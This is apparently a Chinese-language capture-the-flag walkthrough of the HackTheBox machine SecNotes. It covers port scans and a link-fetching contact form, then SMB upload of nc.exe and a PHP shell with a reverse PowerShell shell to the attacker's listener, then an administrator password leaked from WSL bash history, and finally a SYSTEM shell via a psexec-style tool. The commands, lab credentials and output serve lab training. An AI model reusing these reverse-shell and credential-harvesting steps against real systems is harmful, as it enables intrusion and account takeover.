┌──(kali㉿offsec)-[~/Desktop] └─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.97 [sudo] kali 的密码: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-28 21:43 CST Nmap scan report for10.10.10.97 Host is up (0.50s latency). Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 445/tcp open microsoft-ds 8808/tcp open ssports-bcast
Nmap done: 1 IP address (1 host up) scanned in 23.09 seconds
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-title: Secure Notes - Login |_Requested resource was login.php | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: HTB) 8808/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows | http-methods: |_ Potentially risky methods: TRACE Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: | smb2-time: | date: 2024-03-28T13:45:15 |_ start_date: N/A | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 54.63 seconds
3、访问80和8808这两个端口服务,查看下内容
http://10.10.10.97/login.php
http://10.10.10.97:8808/
5、在80端口上注册一个账号,并登录查看信息
1 2 3 4
http://10.10.10.97/register.php
shiyan shiyan
http://10.10.10.97/home.php
6、发现 contact.php 页面可以输入链接地址,且会访问这个链接地址,说明这个是一个漏洞点
http://10.10.10.97/contact.php
在这个页面发送一个带有链接地址 http://10.10.14.11:443
1 2 3 4 5 6 7 8
┌──(kali㉿offsec)-[~/Desktop] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.97] 50709 GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.228 Host: 10.10.14.11:443 Connection: Keep-Alive
我们的nc监听了一个请求,那我继续发送一个带有链接和具体资源指向的地址
http://10.10.14.11:443/whoami?id=1
1 2 3 4 5 6 7 8
┌──(kali㉿offsec)-[~/Desktop] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.97] 50759 GET /whoami?id=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.228 Host: 10.10.14.11:443 Connection: Keep-Alive
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC new-site Disk Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.97 failed (Error NT_STATUS_IO_TIMEOUT) Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿offsec)-[~/Desktop] └─$ smbclient \\\\10.10.10.97\\new-site -U tyler%'92g!mA8BGjOirkL%OG*&' Try "help" to get a list of possible commands. smb: \> put nc.exe putting file nc.exe as \nc.exe (13.9 kb/s) (average 13.9 kb/s) smb: \> put shell.php putting file shell.php as \shell.php (0.0 kb/s) (average 11.1 kb/s) smb: \>
┌──(kali㉿offsec)-[~/Desktop] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.97] 50231 Windows PowerShell Copyright(C) Microsoft Corporation. All rights reserved.
ls C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState
PS C:\Distros\Ubuntu> ls C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState ls C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState
ls C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs
PS C:\Distros\Ubuntu> ls C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs ls C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs
PS C:\Distros\Ubuntu> gc C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root\* gc C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root\* gc : Access to the path 'C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc \LocalState\rootfs\root\filesystem' is denied. At line:1char:1 + gc C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : PermissionDenied: (C:\Users\tyler\...root\filesystem:String) [Get-Content], Unauthorized AccessException + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
# ~/.bashrc: executed by bash(1)for non-login shells. # see /usr/share/doc/bash/examples/startup-files (in the package bash-doc) # for examples
# If not running interactively, don't do anything [ -z "$PS1" ] && return
# don't put duplicate lines in the history. See bash(1) for more options # ... or force ignoredups and ignorespace HISTCONTROL=ignoredups:ignorespace # append to the history file, don't overwrite it shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1) HISTSIZE=1000 HISTFILESIZE=2000
# check the window size after each command and, if necessary, # update the values of LINES and COLUMNS. shopt -s checkwinsize
# make less more friendly for non-text input files, see lesspipe(1) [ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below) if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then debian_chroot=$(cat /etc/debian_chroot) fi
# set a fancy prompt (non-color, unless we know we "want" color) case"$TERM" in xterm-color) color_prompt=yes;; esac
# uncomment for a colored prompt, if the terminal has the capability; turned # off by default to not distract the user: the focus in a terminal window # should be on the output of commands, not on the prompt #force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then # We have color support; assume it's compliant with Ecma-48 # (ISO/IEC-6429). (Lack of such support is extremely rare, and such # a case would tend to support setf rather than setaf.) color_prompt=yes else color_prompt= fi fi
if [ "$color_prompt" = yes ]; then PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ ' else PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ ' fi unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir case"$TERM" in xterm*|rxvt*) PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1" ;; *) ;; esac
# enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ]; then test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)" alias ls='ls --color=auto' #alias dir='dir --color=auto' #alias vdir='vdir --color=auto'
alias grep='grep --color=auto' alias fgrep='fgrep --color=auto' alias egrep='egrep --color=auto' fi
# some more ls aliases alias ll='ls -alF' alias la='ls -A' alias l='ls -CF'
# Alias definitions. # You may want to put all your additions into a separate file like # ~/.bash_aliases, instead of adding them here directly. # See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then . ~/.bash_aliases fi
# enable programmable completion features (you don't need to enable # this, if it's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc). #if [ -f /etc/bash_completion ] && ! shopt -oq posix; then # . /etc/bash_completion #fi
cd ~ cd /mnt/c/ ls cd Users/ cd / cd ~ ls pwd mkdir filesystem mount //127.0.0.1/c$ filesystem/ sudo apt install cifs-utils mount //127.0.0.1/c$ filesystem/ mount //127.0.0.1/c$ filesystem/ -o user=administrator cat /proc/filesystems sudo modprobe cifs smbclient apt install smbclient smbclient smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$ > .bash_history less .bash_history exit # ~/.profile: executed by Bourne-compatible login shells.
if [ "$BASH" ]; then if [ -f ~/.bashrc ]; then . ~/.bashrc fi fi
[*] Requesting shares on 10.10.10.97..... [*] Found writable share ADMIN$ [*] Uploading file SkEcBGeu.exe [*] Opening SVCManager on 10.10.10.97..... [*] Creating service WacH on 10.10.10.97..... [*] Starting service WacH..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17134.228] (c) 2018 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32> C:\WINDOWS\system32> whoami nt authority\system
